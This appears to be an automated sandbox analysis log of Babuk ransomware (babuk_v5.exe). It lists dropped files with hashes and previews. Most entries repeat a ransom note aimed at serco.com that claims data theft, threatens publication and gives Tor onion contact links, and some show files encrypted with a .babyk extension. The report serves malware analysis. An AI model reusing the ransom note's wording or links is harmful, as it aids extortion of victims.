                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.505811750118724
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlV5N0FEX7gToREBrsYVdXyFiBPvPJEvzIg+8Lxl/cNLUxNvEEn:SFEU3LdLBXRaxl0NL0vtn
                                                                            MD5:29E20E399D58F3A2172CE7CEBA6501E2
                                                                            SHA1:0E39D8657C194FFC43619D92A0F55E3429531E8C
                                                                            SHA-256:07B26A0BCF3D83B0B4A47FFF648EFC354B8DE25DD1BB2043715122B04EE24C66
                                                                            SHA-512:66D660D4F6F568D56DF931F047CF3DC29CC5DEB3A27AE4273942E7B4DC3C856E4F2415DA434CC5629E4CE2EB1DA094F562AC0E48EC93337AEEF5E22008DEC088
                                                                            Malicious:false
                                                                            Preview: .....L...}..\..`ls..\p...>..../.|.l/W.T4.(T....W..%.u...JOL.lh.;..l.^.I.px...3%}...Y_k.$7Z..._+...!E%E.Zfa.V................%...~....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.979557814227911
                                                                            Encrypted:false
                                                                            SSDEEP:192:26W9dFuMfhpugTN8fYY3LZtlB9h0NvNEX+8j06ju:LkTuMf7mfr7P+1S/ju
                                                                            MD5:FDCEEACAA5777393B2551355303FABB7
                                                                            SHA1:0C17CC0D16DF86504E39B2C201A21A744959FEBE
                                                                            SHA-256:B27C4DDC4F776F521329AAA90182BB4120442226BAE25FB1719C2D865FDFE788
                                                                            SHA-512:E35DE8122D9F48D0DD8F11EF3E823B29ED7CB3A997A044BE3B53E9ACBECABA94808D5582C8C40B0990E82C642F369DCD8ACF13F3B81C62A54F5AFC9FF69D7E13
                                                                            Malicious:false
                                                                            Preview: .e.;KX.r...KRS...;.XAg....1...F.(..*@..."&0...;u.n........E....av.Y.t.X...L7i9...K...<..LC?..T_..q....2..s..:@..p\.0....Q....au.d....a..?.@tIK...^.......\..j.m.......r.3h.h;.HP.....c..V.v.)..O.......@.....J.7[.g...X/.!....,...=.....y....up...9.....T.\.0.J/.S......C./..x..{.f..,.%X.xy.G..!.sE.....;.+../G.y.V..}.~....1..Us.5..tK.JZ..;dJ:_._.+dA-.....nY^..{U.....?T3.......{`~J..C..Y......Z..5.$..K..+.<.4(2..'_...9.Yk.........YI{p,._nG=..g..W..L..Yf..&.0.....^...=....w#....{n.U._..-..o......al5.>.XN.7.,L.....J.q.j~.?..C...H..>/...]....C.{..\|}.[.PJ@.:........P.....\K..7.X.xI8#X?.d..$5.......Tl.....U).).l'.E.f....H....~....I.e.qdR..^{..sZ..........<...)f....t..$D......l..H....`..{i<?...G8.p.R...s.....'y.B89..MT.<....K.#..[8......!R8.....^....>C..|^oT#.....=p.n..V....Z.uX..l..*sK...qt.o./.{.0Eg.2X.....,..r.^%......U$I<s......CW..........f.....S..C.0.......N?KOP..<..R^o..+a..a. R{.s..m.#.|..:EG..do.......>w=...;.No]..(....._8.A,.692.pv`..iz...t#.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
